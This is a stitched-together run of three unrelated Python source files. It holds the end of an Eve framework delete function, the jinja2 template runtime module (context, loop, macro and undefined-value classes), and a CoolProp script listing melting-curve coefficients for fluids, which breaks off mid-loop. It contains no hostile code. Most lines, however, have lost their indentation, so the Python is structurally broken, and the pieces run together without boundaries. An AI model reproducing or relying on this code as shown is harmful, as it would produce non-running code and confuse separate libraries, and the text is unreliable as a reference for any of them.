default_request = ParsedRequest()
cursor = app.data.find(resource, default_request, lookup)
for document in list(cursor):
document_id = document[app.config['ID_FIELD']]
deleteitem_internal(resource, concurrency_check=False,
suppress_callbacks=True, _id=document_id)
else:
# TODO if the resource schema includes media files, these won't be
# deleted by use of this global method (it should be disabled). Media
# cleanup is handled at the item endpoint by the delete() method
# (see above).
app.data.remove(resource, lookup)
# TODO: should attempt to delete version collection even if setting is
# off
if app.config['DOMAIN'][resource]['versioning'] is True:
app.data.remove(resource + config.VERSIONS, lookup)
getattr(app, "on_deleted_resource")(resource)
getattr(app, "on_deleted_resource_%s" % resource)()
return {}, None, None, 204
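# A minimal usage sketch (not part of the original module): the resource name
# and item id are hypothetical, and an application/request context is assumed
# as for any internal Eve call.
def _example_internal_delete(item_id):
    # Delete one document from a 'contacts' resource without rate limiting,
    # etag checking or callbacks, mirroring the soft-delete loop above.
    return deleteitem_internal('contacts', concurrency_check=False,
                               suppress_callbacks=True, _id=item_id)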
|
|
# -*- coding: utf-8 -*-
"""
jinja2.runtime
~~~~~~~~~~~~~~
Runtime helpers.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD.
"""
import sys
from itertools import chain
from types import MethodType
from jinja2.nodes import EvalContext, _context_function_types
from jinja2.utils import Markup, soft_unicode, escape, missing, concat, \
internalcode, object_type_repr, evalcontextfunction, Namespace
from jinja2.exceptions import UndefinedError, TemplateRuntimeError, \
TemplateNotFound
from jinja2._compat import imap, text_type, iteritems, \
implements_iterator, implements_to_string, string_types, PY2, \
with_metaclass
# these variables are exported to the template runtime
__all__ = ['LoopContext', 'TemplateReference', 'Macro', 'Markup',
'TemplateRuntimeError', 'missing', 'concat', 'escape',
'markup_join', 'unicode_join', 'to_string', 'identity',
'TemplateNotFound', 'Namespace']
#: the name of the function that is used to convert something into
#: a string. We can just use the text type here.
to_string = text_type
#: the identity function. Useful for certain things in the environment
identity = lambda x: x
_first_iteration = object()
_last_iteration = object()
def markup_join(seq):
"""Concatenation that escapes if necessary and converts to unicode."""
buf = []
iterator = imap(soft_unicode, seq)
for arg in iterator:
buf.append(arg)
if hasattr(arg, '__html__'):
return Markup(u'').join(chain(buf, iterator))
return concat(buf)
def unicode_join(seq):
"""Simple args to unicode conversion and concatenation."""
return concat(imap(text_type, seq))
def new_context(environment, template_name, blocks, vars=None,
shared=None, globals=None, locals=None):
"""Internal helper to for context creation."""
if vars is None:
vars = {}
if shared:
parent = vars
else:
parent = dict(globals or (), **vars)
if locals:
# if the parent is shared a copy should be created because
# we don't want to modify the dict passed
if shared:
parent = dict(parent)
for key, value in iteritems(locals):
if value is not missing:
parent[key] = value
return environment.context_class(environment, parent, template_name,
blocks)
class TemplateReference(object):
"""The `self` in templates."""
def __init__(self, context):
self.__context = context
def __getitem__(self, name):
blocks = self.__context.blocks[name]
return BlockReference(name, self.__context, blocks, 0)
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.__context.name
)
def _get_func(x):
return getattr(x, '__func__', x)
class ContextMeta(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if bases == ():
return rv
resolve = _get_func(rv.resolve)
default_resolve = _get_func(Context.resolve)
resolve_or_missing = _get_func(rv.resolve_or_missing)
default_resolve_or_missing = _get_func(Context.resolve_or_missing)
# If we have a changed resolve but no changed default or missing
# resolve we invert the call logic.
if resolve is not default_resolve and \
resolve_or_missing is default_resolve_or_missing:
rv._legacy_resolve_mode = True
elif resolve is default_resolve and \
resolve_or_missing is default_resolve_or_missing:
rv._fast_resolve_mode = True
return rv
def resolve_or_missing(context, key, missing=missing):
if key in context.vars:
return context.vars[key]
if key in context.parent:
return context.parent[key]
return missing
class Context(with_metaclass(ContextMeta)):
"""The template context holds the variables of a template. It stores the
values passed to the template and also the names the template exports.
Creating instances is neither supported nor useful as it's created
automatically at various stages of the template evaluation and should not
be created by hand.
The context is immutable. Modifications on :attr:`parent` **must not**
happen and modifications on :attr:`vars` are allowed from generated
template code only. Template filters and global functions marked as
:func:`contextfunction`\\s get the active context passed as first argument
and are allowed to access the context read-only.
The template context supports read only dict operations (`get`,
`keys`, `values`, `items`, `iterkeys`, `itervalues`, `iteritems`,
`__getitem__`, `__contains__`). Additionally there is a :meth:`resolve`
method that doesn't fail with a `KeyError` but returns an
:class:`Undefined` object for missing variables.
"""
# XXX: we want to eventually make this be a deprecation warning and
# remove it.
_legacy_resolve_mode = False
_fast_resolve_mode = False
def __init__(self, environment, parent, name, blocks):
self.parent = parent
self.vars = {}
self.environment = environment
self.eval_ctx = EvalContext(self.environment, name)
self.exported_vars = set()
self.name = name
# create the initial mapping of blocks. Whenever template inheritance
# takes place the runtime will update this mapping with the new blocks
# from the template.
self.blocks = dict((k, [v]) for k, v in iteritems(blocks))
# In case we detect the fast resolve mode we can set up an alias
# here that bypasses the legacy code logic.
if self._fast_resolve_mode:
self.resolve_or_missing = MethodType(resolve_or_missing, self)
def super(self, name, current):
"""Render a parent block."""
try:
blocks = self.blocks[name]
index = blocks.index(current) + 1
blocks[index]
except LookupError:
return self.environment.undefined('there is no parent block '
'called %r.' % name,
name='super')
return BlockReference(name, self, blocks, index)
def get(self, key, default=None):
"""Returns an item from the template context, if it doesn't exist
`default` is returned.
"""
try:
return self[key]
except KeyError:
return default
def resolve(self, key):
"""Looks up a variable like `__getitem__` or `get` but returns an
        :class:`Undefined` object with the name of the variable looked up.
"""
if self._legacy_resolve_mode:
rv = resolve_or_missing(self, key)
else:
rv = self.resolve_or_missing(key)
if rv is missing:
return self.environment.undefined(name=key)
return rv
def resolve_or_missing(self, key):
"""Resolves a variable like :meth:`resolve` but returns the
special `missing` value if it cannot be found.
"""
if self._legacy_resolve_mode:
rv = self.resolve(key)
if isinstance(rv, Undefined):
rv = missing
return rv
return resolve_or_missing(self, key)
def get_exported(self):
"""Get a new dict with the exported variables."""
return dict((k, self.vars[k]) for k in self.exported_vars)
def get_all(self):
"""Return the complete context as dict including the exported
        variables. For optimization reasons this might not return an
actual copy so be careful with using it.
"""
if not self.vars:
return self.parent
if not self.parent:
return self.vars
return dict(self.parent, **self.vars)
@internalcode
def call(__self, __obj, *args, **kwargs):
"""Call the callable with the arguments and keyword arguments
provided but inject the active context or environment as first
argument if the callable is a :func:`contextfunction` or
:func:`environmentfunction`.
"""
if __debug__:
__traceback_hide__ = True # noqa
# Allow callable classes to take a context
fn = __obj.__call__
for fn_type in ('contextfunction',
'evalcontextfunction',
'environmentfunction'):
if hasattr(fn, fn_type):
__obj = fn
break
if isinstance(__obj, _context_function_types):
if getattr(__obj, 'contextfunction', 0):
args = (__self,) + args
elif getattr(__obj, 'evalcontextfunction', 0):
args = (__self.eval_ctx,) + args
elif getattr(__obj, 'environmentfunction', 0):
args = (__self.environment,) + args
try:
return __obj(*args, **kwargs)
except StopIteration:
return __self.environment.undefined('value was undefined because '
'a callable raised a '
'StopIteration exception')
def derived(self, locals=None):
"""Internal helper function to create a derived context. This is
used in situations where the system needs a new context in the same
template that is independent.
"""
context = new_context(self.environment, self.name, {},
self.get_all(), True, None, locals)
context.eval_ctx = self.eval_ctx
context.blocks.update((k, list(v)) for k, v in iteritems(self.blocks))
return context
def _all(meth):
proxy = lambda self: getattr(self.get_all(), meth)()
proxy.__doc__ = getattr(dict, meth).__doc__
proxy.__name__ = meth
return proxy
keys = _all('keys')
values = _all('values')
items = _all('items')
# not available on python 3
if PY2:
iterkeys = _all('iterkeys')
itervalues = _all('itervalues')
iteritems = _all('iteritems')
del _all
def __contains__(self, name):
return name in self.vars or name in self.parent
def __getitem__(self, key):
"""Lookup a variable or raise `KeyError` if the variable is
undefined.
"""
item = self.resolve_or_missing(key)
if item is missing:
raise KeyError(key)
return item
def __repr__(self):
return '<%s %s of %r>' % (
self.__class__.__name__,
repr(self.get_all()),
self.name
)
# register the context as mapping if possible
try:
from collections import Mapping
Mapping.register(Context)
except ImportError:
pass
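# Illustrative sketch, not used by the runtime itself: it demonstrates the read-only
# mapping behaviour and the resolve()/__getitem__ contrast described in the Context
# docstring above, using only the public jinja2 API. The helper name is arbitrary.
def _context_usage_example():
    from jinja2 import Environment
    ctx = Environment().from_string('{{ greeting }}').new_context({'greeting': 'hi'})
    assert ctx['greeting'] == 'hi'             # dict-style lookup
    assert ctx.get('missing', 42) == 42        # get() falls back to a default
    # resolve() never raises a KeyError; missing names come back as Undefined
    assert isinstance(ctx.resolve('missing'), Undefined)
    assert 'greeting' in ctx and 'missing' not in ctx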
class BlockReference(object):
"""One block on a template reference."""
def __init__(self, name, context, stack, depth):
self.name = name
self._context = context
self._stack = stack
self._depth = depth
@property
def super(self):
"""Super the block."""
if self._depth + 1 >= len(self._stack):
return self._context.environment. \
undefined('there is no parent block called %r.' %
self.name, name='super')
return BlockReference(self.name, self._context, self._stack,
self._depth + 1)
@internalcode
def __call__(self):
rv = concat(self._stack[self._depth](self._context))
if self._context.eval_ctx.autoescape:
rv = Markup(rv)
return rv
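# Illustrative sketch, not used by the runtime itself: BlockReference.super above is what
# backs {{ super() }} inside an overridden block. Public-API example only; the template
# names are made up.
def _block_super_example():
    from jinja2 import DictLoader, Environment
    env = Environment(loader=DictLoader({
        'base.html': '{% block body %}base{% endblock %}',
        'child.html': ('{% extends "base.html" %}'
                       '{% block body %}{{ super() }} + child{% endblock %}'),
    }))
    assert env.get_template('child.html').render() == 'base + child'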
class LoopContextBase(object):
"""A loop context for dynamic iteration."""
_before = _first_iteration
_current = _first_iteration
_after = _last_iteration
_length = None
def __init__(self, undefined, recurse=None, depth0=0):
self._undefined = undefined
self._recurse = recurse
self.index0 = -1
self.depth0 = depth0
self._last_checked_value = missing
def cycle(self, *args):
"""Cycles among the arguments with the current loop index."""
if not args:
raise TypeError('no items for cycling given')
return args[self.index0 % len(args)]
def changed(self, *value):
"""Checks whether the value has changed since the last call."""
if self._last_checked_value != value:
self._last_checked_value = value
return True
return False
first = property(lambda x: x.index0 == 0)
last = property(lambda x: x._after is _last_iteration)
index = property(lambda x: x.index0 + 1)
revindex = property(lambda x: x.length - x.index0)
revindex0 = property(lambda x: x.length - x.index)
depth = property(lambda x: x.depth0 + 1)
@property
def previtem(self):
if self._before is _first_iteration:
return self._undefined('there is no previous item')
return self._before
@property
def nextitem(self):
if self._after is _last_iteration:
return self._undefined('there is no next item')
return self._after
def __len__(self):
return self.length
@internalcode
def loop(self, iterable):
if self._recurse is None:
raise TypeError('Tried to call non recursive loop. Maybe you '
"forgot the 'recursive' modifier.")
return self._recurse(iterable, self._recurse, self.depth0 + 1)
# a nifty trick to enhance the error message if someone tried to call
# the loop without arguments or with too many arguments.
__call__ = loop
del loop
def __repr__(self):
return '<%s %r/%r>' % (
self.__class__.__name__,
self.index,
self.length
)
class LoopContext(LoopContextBase):
def __init__(self, iterable, undefined, recurse=None, depth0=0):
LoopContextBase.__init__(self, undefined, recurse, depth0)
self._iterator = iter(iterable)
# try to get the length of the iterable early. This must be done
# here because there are some broken iterators around where the
# __len__ is the number of iterations left (I'm looking at you,
# listreverseiterator!).
try:
self._length = len(iterable)
except (TypeError, AttributeError):
self._length = None
self._after = self._safe_next()
@property
def length(self):
if self._length is None:
# if it was not possible to get the length of the iterator when
# the loop context was created (i.e. iterating over a generator),
# we have to convert the iterable into a sequence and use the
# length of that + the number of iterations so far.
iterable = tuple(self._iterator)
self._iterator = iter(iterable)
iterations_done = self.index0 + 2
self._length = len(iterable) + iterations_done
return self._length
def __iter__(self):
return LoopContextIterator(self)
def _safe_next(self):
try:
return next(self._iterator)
except StopIteration:
return _last_iteration
@implements_iterator
class LoopContextIterator(object):
"""The iterator for a loop context."""
__slots__ = ('context',)
def __init__(self, context):
self.context = context
def __iter__(self):
return self
def __next__(self):
ctx = self.context
ctx.index0 += 1
if ctx._after is _last_iteration:
raise StopIteration()
ctx._before = ctx._current
ctx._current = ctx._after
ctx._after = ctx._safe_next()
return ctx._current, ctx
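# Illustrative sketch, not used by the runtime itself: the LoopContext/LoopContextIterator
# pair above is what a {% for %} tag exposes as the `loop` variable.
def _loop_context_example():
    from jinja2 import Environment
    out = Environment().from_string(
        '{% for x in seq %}{{ loop.index }}/{{ loop.length }} {% endfor %}'
    ).render(seq=['a', 'b', 'c'])
    assert out == '1/3 2/3 3/3 '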
class Macro(object):
"""Wraps a macro function."""
def __init__(self, environment, func, name, arguments,
catch_kwargs, catch_varargs, caller,
default_autoescape=None):
self._environment = environment
self._func = func
self._argument_count = len(arguments)
self.name = name
self.arguments = arguments
self.catch_kwargs = catch_kwargs
self.catch_varargs = catch_varargs
self.caller = caller
self.explicit_caller = 'caller' in arguments
if default_autoescape is None:
default_autoescape = environment.autoescape
self._default_autoescape = default_autoescape
@internalcode
@evalcontextfunction
def __call__(self, *args, **kwargs):
# This requires a bit of explanation. In the past we used to
# decide largely based on compile-time information whether a macro
# is safe or unsafe. While there was a volatile mode, it was largely
# unused for deciding on escaping. This turns out to be
# problematic for macros because whether a macro is safe depends
# not so much on the escape mode when it was defined but on the
# escape mode when it was used.
#
# Because however we export macros from the module system and
# there are historic callers that do not pass an eval context (and
# will continue to not pass one), we need to perform an instance
# check here.
#
# This is considered safe because an eval context is not a valid
# argument to callables otherwise anyway. The worst case here is
# that if no eval context is passed, we fall back to the
# compile-time autoescape flag.
if args and isinstance(args[0], EvalContext):
autoescape = args[0].autoescape
args = args[1:]
else:
autoescape = self._default_autoescape
# try to consume the positional arguments
arguments = list(args[:self._argument_count])
off = len(arguments)
# For information why this is necessary refer to the handling
# of caller in the `macro_body` handler in the compiler.
found_caller = False
# if the number of arguments consumed is not the number of
# arguments expected we start filling in keyword arguments
# and defaults.
if off != self._argument_count:
for idx, name in enumerate(self.arguments[len(arguments):]):
try:
value = kwargs.pop(name)
except KeyError:
value = missing
if name == 'caller':
found_caller = True
arguments.append(value)
else:
found_caller = self.explicit_caller
# it's important that the order of these arguments does not change
# if not also changed in the compiler's `function_scoping` method.
# the order is caller, keyword arguments, positional arguments!
if self.caller and not found_caller:
caller = kwargs.pop('caller', None)
if caller is None:
caller = self._environment.undefined('No caller defined',
name='caller')
arguments.append(caller)
if self.catch_kwargs:
arguments.append(kwargs)
elif kwargs:
if 'caller' in kwargs:
raise TypeError('macro %r was invoked with two values for '
'the special caller argument. This is '
'most likely a bug.' % self.name)
raise TypeError('macro %r takes no keyword argument %r' %
(self.name, next(iter(kwargs))))
if self.catch_varargs:
arguments.append(args[self._argument_count:])
elif len(args) > self._argument_count:
raise TypeError('macro %r takes no more than %d argument(s)' %
(self.name, len(self.arguments)))
return self._invoke(arguments, autoescape)
def _invoke(self, arguments, autoescape):
"""This method is being swapped out by the async implementation."""
rv = self._func(*arguments)
if autoescape:
rv = Markup(rv)
return rv
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
self.name is None and 'anonymous' or repr(self.name)
)
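# Illustrative sketch, not used by the runtime itself: a template-defined macro is wrapped
# in the Macro class above, and calling it fills defaults exactly as __call__ describes.
def _macro_example():
    from jinja2 import Environment
    tmpl = Environment().from_string(
        '{% macro greet(name, punct="!") %}Hello {{ name }}{{ punct }}{% endmacro %}'
        '{{ greet("World") }}{{ greet("World", punct="?") }}'
    )
    assert tmpl.render() == 'Hello World!Hello World?'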
@implements_to_string
class Undefined(object):
"""The default undefined type. This undefined type can be printed and
iterated over, but every other access will raise an :exc:`jinja2.exceptions.UndefinedError`:
>>> foo = Undefined(name='foo')
>>> str(foo)
''
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ('_undefined_hint', '_undefined_obj', '_undefined_name',
'_undefined_exception')
def __init__(self, hint=None, obj=missing, name=None, exc=UndefinedError):
self._undefined_hint = hint
self._undefined_obj = obj
self._undefined_name = name
self._undefined_exception = exc
@internalcode
def _fail_with_undefined_error(self, *args, **kwargs):
"""Regular callback function for undefined objects that raises an
`jinja2.exceptions.UndefinedError` on call.
"""
if self._undefined_hint is None:
if self._undefined_obj is missing:
hint = '%r is undefined' % self._undefined_name
elif not isinstance(self._undefined_name, string_types):
hint = '%s has no element %r' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
else:
hint = '%r has no attribute %r' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
else:
hint = self._undefined_hint
raise self._undefined_exception(hint)
@internalcode
def __getattr__(self, name):
if name[:2] == '__':
raise AttributeError(name)
return self._fail_with_undefined_error()
__add__ = __radd__ = __mul__ = __rmul__ = __div__ = __rdiv__ = \
__truediv__ = __rtruediv__ = __floordiv__ = __rfloordiv__ = \
__mod__ = __rmod__ = __pos__ = __neg__ = __call__ = \
__getitem__ = __lt__ = __le__ = __gt__ = __ge__ = __int__ = \
__float__ = __complex__ = __pow__ = __rpow__ = __sub__ = \
__rsub__ = _fail_with_undefined_error
def __eq__(self, other):
return type(self) is type(other)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return id(type(self))
def __str__(self):
return u''
def __len__(self):
return 0
def __iter__(self):
if 0:  # unreachable; makes __iter__ an empty generator
yield None
def __nonzero__(self):
return False
__bool__ = __nonzero__
def __repr__(self):
return 'Undefined'
def make_logging_undefined(logger=None, base=None):
"""Given a logger object this returns a new undefined class that will
log certain failures. It will log iterations and printing. If no
logger is given, a default logger is created.
Example::
logger = logging.getLogger(__name__)
LoggingUndefined = make_logging_undefined(
logger=logger,
base=Undefined
)
.. versionadded:: 2.8
:param logger: the logger to use. If not provided, a default logger
is created.
:param base: the base class to add logging functionality to. This
defaults to :class:`Undefined`.
"""
if logger is None:
import logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(sys.stderr))
if base is None:
base = Undefined
def _log_message(undef):
if undef._undefined_hint is None:
if undef._undefined_obj is missing:
hint = '%s is undefined' % undef._undefined_name
elif not isinstance(undef._undefined_name, string_types):
hint = '%s has no element %s' % (
object_type_repr(undef._undefined_obj),
undef._undefined_name)
else:
hint = '%s has no attribute %s' % (
object_type_repr(undef._undefined_obj),
undef._undefined_name)
else:
hint = undef._undefined_hint
logger.warning('Template variable warning: %s', hint)
class LoggingUndefined(base):
def _fail_with_undefined_error(self, *args, **kwargs):
try:
return base._fail_with_undefined_error(self, *args, **kwargs)
except self._undefined_exception as e:
logger.error('Template variable error: %s', str(e))
raise e
def __str__(self):
rv = base.__str__(self)
_log_message(self)
return rv
def __iter__(self):
rv = base.__iter__(self)
_log_message(self)
return rv
if PY2:
def __nonzero__(self):
rv = base.__nonzero__(self)
_log_message(self)
return rv
def __unicode__(self):
rv = base.__unicode__(self)
_log_message(self)
return rv
else:
def __bool__(self):
rv = base.__bool__(self)
_log_message(self)
return rv
return LoggingUndefined
@implements_to_string
class DebugUndefined(Undefined):
"""An undefined that returns the debug info when printed.
>>> foo = DebugUndefined(name='foo')
>>> str(foo)
'{{ foo }}'
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ()
def __str__(self):
if self._undefined_hint is None:
if self._undefined_obj is missing:
return u'{{ %s }}' % self._undefined_name
return '{{ no such element: %s[%r] }}' % (
object_type_repr(self._undefined_obj),
self._undefined_name
)
return u'{{ undefined value printed: %s }}' % self._undefined_hint
@implements_to_string
class StrictUndefined(Undefined):
"""An undefined that barks on print and iteration as well as boolean
tests and all kinds of comparisons. In other words: you can do nothing
with it except checking if it's defined using the `defined` test.
>>> foo = StrictUndefined(name='foo')
>>> str(foo)
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
>>> not foo
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
"""
__slots__ = ()
__iter__ = __str__ = __len__ = __nonzero__ = __eq__ = \
__ne__ = __bool__ = __hash__ = \
Undefined._fail_with_undefined_error
# remove remaining slots attributes, after the metaclass did the magic they
# are unneeded and irritating as they contain wrong data for the subclasses.
del Undefined.__slots__, DebugUndefined.__slots__, StrictUndefined.__slots__
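# Illustrative sketch, not part of the module logic: how the three undefined types above
# differ when a missing name is rendered, using only the public jinja2 API.
def _undefined_flavours_example():
    from jinja2 import DebugUndefined, Environment, StrictUndefined
    from jinja2.exceptions import UndefinedError
    assert Environment().from_string('{{ missing }}').render() == ''
    assert (Environment(undefined=DebugUndefined)
            .from_string('{{ missing }}').render() == '{{ missing }}')
    try:
        Environment(undefined=StrictUndefined).from_string('{{ missing }}').render()
    except UndefinedError as exc:
        assert 'missing' in str(exc)
    else:
        raise AssertionError('StrictUndefined should have raised')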
|
|
from __future__ import print_function
import os, json
Simon_curves = {
"n-Propane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -187.75 + 273.15, "parts": [{"T_0" : 85.3, "a" : 7.180e8, "c" : 1.283, "p_0" : 0.0, "T_max" : 168.63}]
},
"n-Pentane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -129.89 + 273.15, "parts": [{"T_0" : 143.5, "a" : 6.600e8, "c" : 1.649, "p_0" : 0.0, "T_max" : 156.2}]
},
"Isopentane" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -159.92 + 273.15, "parts": [{"T_0" : 112.5, "a" : 5.916e8, "c" : 1.563, "p_0" : 0, "T_max" : 212.16}]
},
"Propylene" : {
"BibTeX" : "Reeves-JCP-1964", "T_m": -185.09 + 273.15, "parts": [{"T_0" : 86.0, "a" : 3.196e8, "c" : 2.821, "p_0" : 0, "T_min": 86.0, "T_max" : 129},
{"T_0" : 109.6, "a" : 3.064e8, "c" : 3.871, "p_0" : 4.450e8, "T_min": 129, "T_max" : 145.3}]
},
"Cyclohexane" : {
"BibTeX" : "Penoncello-IJT-1995", "T_m": 6.81 + 273.15, "parts": [{"T_0" : 279.7, "a" : 383.4e6, "c" : 1.41, "p_0" : 0, "T_max" : 401.7}]
},
"Krypton" : {
"BibTeX" : "Michels-PHYSICA-1962", "T_m": 115.95, "parts": [{"T_0" : 1, "a" : 109479.2307, "c" : 1.6169841, "p_0" : -237497645.7, "T_max" : 168.7}]
},
"Xenon" : {
"BibTeX" : "Michels-PHYSICA-1962", "T_m": 165.02, "parts": [{"T_0" : 1, "a" : 80890.5544859, "c" : 1.5891650, "p_0" : -260932309.446, "T_max" : 366.4}]
},
"CarbonMonoxide" : {
"BibTeX" : "Barreiros-JCT-1982", "T_m": 68.3, "parts": [{"T_0" : 1, "a" : 19560.8, "c" : 2.10747, "p_0" : -142921439.2, "T_max" : 87.5}]
},
"Oxygen": {
"BibTeX" : "Younglove-NIST-1982", "T_m": 54.75, "parts": [{"T_0" : 1, "a" : 227606.348, "c" : 1.769, "p_0" : -266999247.652, "T_max" : 63.1}]
},
"ParaHydrogen": {
"BibTeX" : "Younglove-NIST-1982", "T_m": 18.9, "parts": [{"T_0" : 1, "a" : 125746.643, "c" : 1.955, "p_0" : -21155737.752, "T_min" : 13.8033, "T_max" : 22},
{"T_0" : 1, "a" : 248578.596, "c" : 1.764739, "p_0" : -26280332.904, "T_min" : 22, "T_max" : 164.5}]
},
"Methane": {
"BibTeX" : "Abramson-HPR-2011", "T_m": 90.7, "parts": [{"T_0" : 90.6941, "a" : 0.208e9, "c" : 1.698, "p_0" : 1.17e4, "T_max" : 600}]
},
"Helium": {
"BibTeX" : "Datchi-PRB-2000", "T_m": 1.15, "parts": [{"T_0" : 1, "a" : 1.6067e6, "c" : 1.565, "p_0" : -1.6067e6, "T_max" : 700}]
},
"Neon": {
"BibTeX" : "SantamariaPerez-PRB-2010", "T_m": -1, "parts": [{"T_0" : 24.4, "a" : 1.7e9, "c" : 1/0.77, "p_0" : 101325, "T_max" : 700}]
},
"Hydrogen": {
"BibTeX" : "Datchi-PRB-2000", "T_m": 14.009985, "parts": [{"T_0" : 1, "a" : 2.31e5, "c" : 1.7627, "p_0" : -0.0052e6-2.31e5, "T_max" : 700}]
}
}
polynomial_in_Tr = {
"Argon" : {
"BibTeX" : "Tegeler-JPCRD-1999", "T_m": 87.28, "parts": [{"T_0" : 83.8058, "a" : [-7476.2665, 9959.0613], "t" : [1.05,1.275], "p_0" : 68891, "T_max" : 254.0}]
},
"Fluorine" : {
"BibTeX" : "deReuck-BOOK-1990", "T_m": 53.15, "parts": [{"T_0" : 53.4811, "a" : [988043.478261], "t" : [2.1845], "p_0" : 252, "T_max" : 55.4}]
},
"Nitrogen" : {
"BibTeX" : "Span-JPCRD-2000", "T_m": 77.34, "parts": [{"T_0" : 63.151, "a" : [12798.61], "t" : [1.78963], "p_0" : 12523, "T_max" : 283.8}]
},
"Ethane" : {
"BibTeX" : "Buecker-JCRD-2006", "T_m": 90.4, "parts": [{"T_0" : 90.368, "a" : [2.23626315e8, 1.05262374e8], "t" : [1.0, 2.55], "p_0" : 1.14, "T_max" : 110.2}]
},
"Isobutane" : {
"BibTeX" : "Buecker-JPCRD-2006B", "T_m": 113.55, "parts": [{"T_0" : 113.73, "a" : [1.9536371309e9], "t" : [6.12], "p_0" : 0.0219, "T_max" : 124.9}]
},
"Ethylene" : {
"BibTeX" : "Smukala-JPCRD-2000", "T_m": 169, "parts": [{"T_0" : 103.989, "a" : [2947001.84], "t" : [2.045], "p_0" : 122.65, "T_min" : 103.989, "T_max" : 110.369},
{"T_0" : 110.369, "a" : [6.82693421], "t" : [1.089], "p_0" : 46.8e6, "T_min" : 110.369, "T_max" : 188}]
},
"n-Butane" : {
"BibTeX" : "Buecker-JPCRD-2006B", "T_m": -137.92 + 273.15, "parts": [{"T_0" : 134.895, "a" : [5.585582364e8], "t" : [2.206], "p_0" : 0.653, "T_max" : 163.9}]
},
"Water" : {
"BibTeX" : "IAPWS", "T_m": -1, "parts": [{"T_0" : 273.16, "a" : [-0.119539337e7,-0.808183159e5,-0.333826860e4], "t" : [0.3000000e1, 0.257500e2, 0.103750e3], "p_0" : 611.657, "T_min": 273.16, "T_max" : 251.165},
{"T_0" : 251.165, "a" : [0.299948], "t" : [60], "p_0" : 208.566e6, "T_min": 251.165, "T_max" : 256.164},
{"T_0" : 256.164, "a" : [1.18721], "t" : [8], "p_0" : 350.1e6, "T_min": 256.164, "T_max" : 273.31},
{"T_0" : 273.31, "a" : [1.07476], "t" : [4.6], "p_0" : 623.4e6, "T_min": 273.31, "T_max" : 355}
]
}
}
polynomial_in_theta = {
"Methanol" : {
"BibTeX" : "deReuck-BOOK-1993", "T_m": 337.8, "parts": [{"T_0" : 175.61, "a" : [5.330770e9, 4.524780e9, 3.888861e10], "t" : [1, 1.5, 4], "p_0" : 0.187, "T_max" : 245.9}]
},
"CarbonDioxide" : {
"BibTeX" : "Span-JPCRD-1996", "T_m": 216.58, "parts": [{"T_0" : 216.592, "a" : [1955.5390, 2055.4593], "t" : [1, 2], "p_0" : 517950, "T_max" : 327.6}]
}
}
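# Minimal sketch of how the entries above are meant to be read (illustration only; the
# plotting code below recomputes these expressions inline). A Simon-curve part encodes
#     p(T) = p_0 + a*((T/T_0)**c - 1),
# a polynomial_in_Tr part encodes p(T) = p_0*(1 + sum_i a_i*((T/T_0)**t_i - 1)), and a
# polynomial_in_theta part encodes p(T) = p_0*(1 + sum_i a_i*(T/T_0 - 1)**t_i).
def _eval_simon_part(part, T):
    return part["p_0"] + part["a"]*((T/part["T_0"])**part["c"] - 1.0)
# e.g. _eval_simon_part(Simon_curves["Methane"]["parts"][0], 300.0) gives roughly 1.4e9 Pa.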
import CoolProp
__ = 0
for fluid in CoolProp.__fluids__:
if fluid not in Simon_curves and fluid not in polynomial_in_Tr and fluid not in polynomial_in_theta:
print(fluid)
__ += 1
else:
print(' '*30, fluid)
print(__)
import CoolProp.CoolProp as CP
import json, numpy as np, matplotlib.pyplot as plt, pandas
ip = 1
irho = 1
Nrow,Ncol = 5,5
figp = plt.figure(figsize = (20,20))
figrho = plt.figure(figsize = (20,20))
def plot_rho(T, rho, fit = False):
x, y = (T-T[0])/(T[len(T)-1]-T[0]), (rho-rho[0])/(rho[len(rho)-1]-rho[0])
c = np.polyfit(x, y, 3)
yfit = np.polyval(c, x)
err = yfit - y
rms = np.sqrt(np.mean(np.power(err,2)))
rhofit = yfit*(rho[len(rho)-1]-rho[0])+rho[0]
if fit:
return T, (rhofit/rho-1)*100
else:
return x, y
def simon():
global ip, irho
for fluid, values in Simon_curves.items():
axp = figp.add_subplot(Nrow, Ncol, ip); ip += 1
axrho = figrho.add_subplot(Nrow, Ncol, irho); irho += 1
axp.set_xlabel('T [K]')
axp.set_ylabel('p [Pa]')
axrho.set_xlabel('T [K]')
axrho.set_ylabel('rho [mol/m$^3$]')
axp.set_title(fluid+' - '+str(round(CP.Props(fluid,"molemass"),2)))
axrho.set_title(fluid)
fname = os.path.join('fluids',fluid+'.json')
j = json.load(open(fname,'r'))
for part in values['parts']:
if 'T_min' not in part:
part['T_min'] = round(CP.Props(fluid,"Tmin"),4)
values['type'] = 'Simon'
j['ANCILLARIES']['melting_line'] = values
fp = open(fname,'w')
from package_json import json_options
fp.write(json.dumps(j,**json_options))
fp.close()
# if not isinstance(values, list):
# values = [values]
# df = pandas.read_csv('melting_curves/'+fluid+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
# else:
# for i in ['I','II']:
# df = pandas.read_csv('melting_curves/'+fluid+'-'+i+'.mlt',names=['T','p','rho'])
# axp.plot(df['T'], df['p'], 'o', mfc='none')
# x,y = plot_rho(df['T'],df['rho'],fit = True)
# axrho.plot(x,y, 'o', mfc='none')
T_m = values['T_m']
for i, value in enumerate(values['parts']):
Tmin = value.get('T_min',CP.Props(fluid,"Tmin"))
Tmax = value['T_max']
